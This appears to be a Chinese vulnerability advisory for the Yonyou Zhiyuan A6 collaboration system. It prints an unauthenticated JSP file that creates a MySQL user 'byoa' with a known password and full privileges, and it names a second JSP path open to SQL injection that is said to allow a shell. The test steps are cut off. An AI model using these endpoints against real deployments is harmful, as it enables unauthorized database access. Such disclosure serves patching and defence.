用友致远A6协同系统敏感信息泄露&SQL注射

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: 用友致远A6协同系统敏感信息泄露&SQL注射,union可shell ### 详细说明: #1重置数据库账号密码漏洞 ``` /yyoa/ext/byoa/start.jsp ``` 该文件的代码为: ``` <% Connection conn = null; PreparedStatement pstmt = null; String sql = "create user byoa IDENTIFIED by 'byoa'"; try { conn = null;//net.btdz.oa.common.ConnectionPoolBean.getConnection(); pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); sql = "grant all on *.* to byoa"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "update mysql.user set password=password('byoa') where user='byoa'"; pstmt = conn.prepareStatement(sql); out.println(pstmt.executeUpdate()); pstmt.close(); sql = "flush privileges"; pstmt = conn.prepareStatement(sql); out.print(pstmt.executeUpdate()); pstmt.close(); //conn.close(); } catch (Exception ex) { out.println(ex.getMessage()); } %> ``` 可以看出该文件没有验证任何权限,便进行了重置数据库用户byoa的密码为: byoa #2 mysql+jsp注射 ``` /yyoa/ext/trafaxserver/ExtnoManage/isNotInTable.jsp ``` 测试方法 ```...

0%

漏洞利用/PoC

暂无可用Exp或PoC

受影响的平台与产品

当前有0条受影响产品信息